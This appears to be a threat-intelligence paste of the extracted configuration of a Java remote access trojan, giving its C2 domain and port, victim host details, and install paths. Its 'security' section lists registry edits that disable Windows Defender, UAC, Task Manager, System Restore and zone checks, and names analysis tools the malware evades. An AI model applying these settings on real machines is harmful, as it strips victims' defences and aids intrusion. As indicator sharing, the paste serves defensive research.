James_inthe_box

Config — extracted configuration of a Java-based RAT sample (runs under a dropped JRE at C:\Users\Larry\Oracle\bin\javaw.exe; C2 humblechrisj.loginto.me:4083; the "security" list holds the registry edits and process kills used to disable Windows Defender, UAC, Task Manager, System Restore and attachment zone checking, plus process names of analysis tools it watches for)

Dec 18th, 2019
  1. {
  2. "serverPath": "C:\\Users\\Larry\\AppData\\Roaming\\mzjipfvdtk.txt",
  3. "securityRetry": 20,
  4. "vbox": false,
  5. "serverVersion": "v1.0.1",
  6. "mainPath": "C:\\Users\\Larry\\JGMVI",
  7. "nickName": "BTC",
  8. "vmware": false,
  9. "encryptKey": "aitCHKJKhsvedAUApILrTqETU",
  10. "operatingSystem": {
  11. "osDefaultArch": "x86",
  12. "country": {
  13. "code": "us",
  14. "name": "United States"
  15. },
  16. "antivirus": "Windows Defender, ",
  17. "icon": "windows10",
  18. "admin": false,
  19. "language": "English (United States)",
  20. "type": 1,
  21. "processor": 4,
  22. "osDefaultName": "Windows 10",
  23. "computerUser": "Larry",
  24. "javaArchitecture": "x86",
  25. "computerName": "LARRY-ACCOUNTIN",
  26. "name": "Windows 10 Enterprise",
  27. "osDefaultVersion": "10.0",
  28. "jreVersion": "1.8.0_181",
  29. "architecture": "amd64",
  30. "ram": "7 GB"
  31. },
  32. "uuid": "6b828d04-e7fe-4f2f-a055-b2dca0699906",
  33. "command": 1,
  34. "network": [
  35. {
  36. "delay": 2,
  37. "port": 4083,
  38. "dns": "humblechrisj.loginto.me"
  39. }
  40. ],
  41. "jrePath": "C:\\Users\\Larry\\Oracle\\bin\\javaw.exe",
  42. "userTitle": "Larry@LARRY-ACCOUNTIN",
  43. "security": [
  44. {
  45. "code": "open-file-security",
  46. "reg": [
  47. {
  48. "value": "\"SaveZoneInformation\"=dword:00000001\r\n",
  49. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments",
  50. "valuesCommand": [
  51. {
  52. "name": "SaveZoneInformation",
  53. "valueCommand": "1",
  54. "valueCommandType": "REG_DWORD",
  55. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"
  56. }
  57. ]
  58. },
  59. {
  60. "value": "\"LowRiskFileTypes\"=\".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;\"\r\n",
  61. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",
  62. "valuesCommand": [
  63. {
  64. "name": "LowRiskFileTypes",
  65. "valueCommand": ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;",
  66. "valueCommandType": "REG_SZ",
  67. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"
  68. }
  69. ]
  70. },
  71. {
  72. "value": "\"SaveZoneInformation\"=\"-\"\r\n",
  73. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments",
  74. "valuesCommand": [
  75. {
  76. "name": "SaveZoneInformation",
  77. "valueCommand": "-",
  78. "valueCommandType": "REG_SZ",
  79. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"
  80. }
  81. ]
  82. },
  83. {
  84. "value": "\"LowRiskFileTypes\"=\"-\"\r\n",
  85. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",
  86. "valuesCommand": [
  87. {
  88. "name": "LowRiskFileTypes",
  89. "valueCommand": "-",
  90. "valueCommandType": "REG_SZ",
  91. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"
  92. }
  93. ]
  94. }
  95. ],
  96. "name": {
  97. "en": "Open-File Security Warning"
  98. }
  99. },
  100. {
  101. "code": "disable-zone-checking",
  102. "reg": [
  103. {
  104. "value": "\"SEE_MASK_NOZONECHECKS\"=\"1\"\r\n",
  105. "key": "HKEY_CURRENT_USER\\Environment",
  106. "valuesCommand": [
  107. {
  108. "name": "SEE_MASK_NOZONECHECKS",
  109. "valueCommand": "1",
  110. "valueCommandType": "REG_SZ",
  111. "key": "HKEY_CURRENT_USER\\Environment"
  112. }
  113. ]
  114. },
  115. {
  116. "value": "\"SEE_MASK_NOZONECHECKS\"=\"1\"\r\n",
  117. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment",
  118. "valuesCommand": [
  119. {
  120. "name": "SEE_MASK_NOZONECHECKS",
  121. "valueCommand": "1",
  122. "valueCommandType": "REG_SZ",
  123. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"
  124. }
  125. ]
  126. }
  127. ],
  128. "name": {
  129. "en": "Disable Zone Checking"
  130. }
  131. },
  132. {
  133. "process": [
  134. "UserAccountControlSettings.exe"
  135. ],
  136. "code": "user-account-control",
  137. "reg": [
  138. {
  139. "value": "\"ConsentPromptBehaviorAdmin\"=dword:00000000\r\n\"ConsentPromptBehaviorUser\"=dword:00000000\r\n\"EnableLUA\"=dword:00000000\r\n\"PromptOnSecureDesktop\"=dword:00000000\r\n",
  140. "key": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
  141. "valuesCommand": []
  142. }
  143. ],
  144. "name": {
  145. "en": "User Account Control"
  146. }
  147. },
  148. {
  149. "process": [
  150. "Taskmgr.exe"
  151. ],
  152. "code": "task-manager",
  153. "reg": [
  154. {
  155. "value": "\"DisableTaskMgr\"=dword:00000002\r\n",
  156. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
  157. "valuesCommand": [
  158. {
  159. "name": "DisableTaskMgr",
  160. "valueCommand": "2",
  161. "valueCommandType": "REG_DWORD",
  162. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
  163. }
  164. ]
  165. }
  166. ],
  167. "name": {
  168. "en": "Task Manager"
  169. }
  170. },
  171. {
  172. "code": "restore-system",
  173. "reg": [
  174. {
  175. "value": "\"DisableConfig\"=dword:00000001\r\n\"DisableSR\"=dword:00000001\r\n",
  176. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore",
  177. "valuesCommand": [
  178. {
  179. "name": "DisableConfig",
  180. "valueCommand": "1",
  181. "valueCommandType": "REG_DWORD",
  182. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore"
  183. },
  184. {
  185. "name": "DisableSR",
  186. "valueCommand": "1",
  187. "valueCommandType": "REG_DWORD",
  188. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore"
  189. }
  190. ]
  191. }
  192. ],
  193. "name": {
  194. "en": "Restore System"
  195. }
  196. },
  197. {
  198. "process": [
  199. "ProcessHacker.exe"
  200. ],
  201. "code": "process-hacker",
  202. "name": {
  203. "en": "Process Hacker"
  204. }
  205. },
  206. {
  207. "process": [
  208. "procexp.exe"
  209. ],
  210. "code": "msconfig",
  211. "name": {
  212. "en": "MsConfig"
  213. }
  214. },
  215. {
  216. "process": [
  217. "MSASCuiL.exe",
  218. "MSASCui.exe",
  219. "MsMpEng.exe",
  220. "MpUXSrv.exe",
  221. "MpCmdRun.exe",
  222. "NisSrv.exe",
  223. "ConfigSecurityPolicy.exe"
  224. ],
  225. "code": "windows-defender",
  226. "reg": [
  227. {
  228. "value": "\"DisableAntiSpyware\"=dword:00000001\r\n",
  229. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender",
  230. "valuesCommand": [
  231. {
  232. "name": "DisableAntiSpyware",
  233. "valueCommand": "1",
  234. "valueCommandType": "REG_DWORD",
  235. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender"
  236. }
  237. ]
  238. },
  239. {
  240. "value": "\"DisableBehaviorMonitoring\"=dword:00000001\r\n\"DisableOnAccessProtection\"=dword:00000001\r\n\"DisableScanOnRealtimeEnable\"=dword:00000001\r\n",
  241. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
  242. "valuesCommand": [
  243. {
  244. "name": "DisableBehaviorMonitoring",
  245. "valueCommand": "1",
  246. "valueCommandType": "REG_DWORD",
  247. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
  248. },
  249. {
  250. "name": "DisableOnAccessProtection",
  251. "valueCommand": "1",
  252. "valueCommandType": "REG_DWORD",
  253. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
  254. },
  255. {
  256. "name": "DisableScanOnRealtimeEnable",
  257. "valueCommand": "1",
  258. "valueCommandType": "REG_DWORD",
  259. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
  260. }
  261. ]
  262. }
  263. ],
  264. "name": {
  265. "en": "Windows Defender"
  266. }
  267. },
  268. {
  269. "code": "windows-defender-exclusion",
  270. "name": {
  271. "en": "Windows Defender Exclusion"
  272. }
  273. },
  274. {
  275. "process": [
  276. "procexp.exe"
  277. ],
  278. "code": "process-explorer",
  279. "name": {
  280. "en": "Process Explorer"
  281. }
  282. },
  283. {
  284. "process": [
  285. "wireshark.exe",
  286. "tshark.exe",
  287. "text2pcap.exe",
  288. "rawshark.exe",
  289. "dumpcap.exe",
  290. "capinfos.exe"
  291. ],
  292. "code": "wireshark",
  293. "name": {
  294. "en": "Wireshark"
  295. }
  296. },
  297. {
  298. "process": [
  299. "Procmon.exe"
  300. ],
  301. "code": "process-monitor",
  302. "name": {
  303. "en": "Process Monitor"
  304. }
  305. },
  306. {
  307. "code": "avira",
  308. "name": {
  309. "en": "Avira"
  310. }
  311. },
  312. {
  313. "code": "eset",
  314. "name": {
  315. "en": "ESET Security"
  316. }
  317. },
  318. {
  319. "code": "bitdefender",
  320. "name": {
  321. "en": "Bitdefender"
  322. }
  323. },
  324. {
  325. "code": "malwarebytes",
  326. "name": {
  327. "en": "MalwareBytes"
  328. }
  329. },
  330. {
  331. "code": "adware-antivirus",
  332. "name": {
  333. "en": "Ad-Aware Antivirus"
  334. }
  335. },
  336. {
  337. "code": "bull-guard",
  338. "name": {
  339. "en": "Bull Guard Antivirus"
  340. }
  341. },
  342. {
  343. "code": "clamwin",
  344. "name": {
  345. "en": "ClamWin Antivirus"
  346. }
  347. },
  348. {
  349. "code": "comodo",
  350. "name": {
  351. "en": "COMODO Antivirus"
  352. }
  353. },
  354. {
  355. "code": "escan",
  356. "name": {
  357. "en": "EScan Antivirus"
  358. }
  359. },
  360. {
  361. "code": "f-secure",
  362. "name": {
  363. "en": "F-Secure Antivirus"
  364. }
  365. },
  366. {
  367. "code": "f-prot",
  368. "name": {
  369. "en": "F-PROT Antivirus"
  370. }
  371. },
  372. {
  373. "code": "gdata",
  374. "name": {
  375. "en": "G DATA Antivirus"
  376. }
  377. },
  378. {
  379. "code": "ikarus",
  380. "name": {
  381. "en": "IKARUS Antivirus"
  382. }
  383. },
  384. {
  385. "code": "immunet",
  386. "name": {
  387. "en": "Immunet Antivirus"
  388. }
  389. },
  390. {
  391. "code": "k7ultimate",
  392. "name": {
  393. "en": "K7 Security"
  394. }
  395. },
  396. {
  397. "code": "nano",
  398. "name": {
  399. "en": "NANO Antivirus"
  400. }
  401. },
  402. {
  403. "code": "panda",
  404. "name": {
  405. "en": "Panda Antivirus"
  406. }
  407. },
  408. {
  409. "code": "super-anti-spyware",
  410. "name": {
  411. "en": "SUPER Anti-Spyware"
  412. }
  413. },
  414. {
  415. "code": "trend-micro",
  416. "name": {
  417. "en": "Trend Micro Antivirus"
  418. }
  419. },
  420. {
  421. "code": "vipre-security",
  422. "name": {
  423. "en": "VIPRE"
  424. }
  425. },
  426. {
  427. "code": "mcshield",
  428. "name": {
  429. "en": "MCShield Anti-Malware Tool"
  430. }
  431. },
  432. {
  433. "code": "spybot",
  434. "name": {
  435. "en": "SPYBOT AntiMalware"
  436. }
  437. },
  438. {
  439. "code": "forti-client",
  440. "name": {
  441. "en": "FortiClient"
  442. }
  443. },
  444. {
  445. "code": "twister",
  446. "name": {
  447. "en": "Twister Antivirus"
  448. }
  449. },
  450. {
  451. "code": "quickheal",
  452. "name": {
  453. "en": "Quick Heal"
  454. }
  455. },
  456. {
  457. "code": "arcabit",
  458. "name": {
  459. "en": "Arcabit"
  460. }
  461. },
  462. {
  463. "code": "totaldefense",
  464. "name": {
  465. "en": "Total Defense"
  466. }
  467. },
  468. {
  469. "code": "emisoft",
  470. "name": {
  471. "en": "Emsisoft Anti-Malware"
  472. }
  473. },
  474. {
  475. "code": "zillya",
  476. "name": {
  477. "en": "Zillya"
  478. }
  479. },
  480. {
  481. "code": "tachyon",
  482. "name": {
  483. "en": "TACHYON"
  484. }
  485. },
  486. {
  487. "code": "trustport",
  488. "name": {
  489. "en": "TrustPort"
  490. }
  491. },
  492. {
  493. "code": "xvirus",
  494. "name": {
  495. "en": "Xvirus"
  496. }
  497. }
  498. ],
  499. "installDate": {
  500. "daysRunning": 0,
  501. "lastModified": 1576685577058
  502. },
  503. "installation": {
  504. "jarName": "YwJnB",
  505. "moduleFolder": "LLQcu",
  506. "moduleEntry": "ZgKdOtqwKDcUfsRZplMiNIZkxFWnZCITYRIQnhAneALQalUBbSKiRQTEZnabYjXvgbNikDvt/IuuMMwdSMVnSuTLnLWfJZHVtl/lPrxiOAajrPnmNDnqmSKZEIrZHYFhgESWDWQTMZjlTpjWXlNWebDvoNPUtQYDaUMBDxeJckICJJmRdLbtHlXKIQigeaR.lrQFnaCQPrXFFrlHwFMIxnnIHLTruYFGtsadPfVUcGjAZoJiTkKVwrAWWAGGmOZWKRqVwvc",
  507. "uniqueIDFile": ".ntusernt.ini",
  508. "delay": 2,
  509. "jreFolder": "Oracle",
  510. "active": true,
  511. "mainFolder": "JGMVI",
  512. "moduleExtension": "gGS",
  513. "jarExtension": "class",
  514. "jarRegistry": "UgYGDsA"
  515. },
  516. "localIp": "172.16.0.2"
  517. }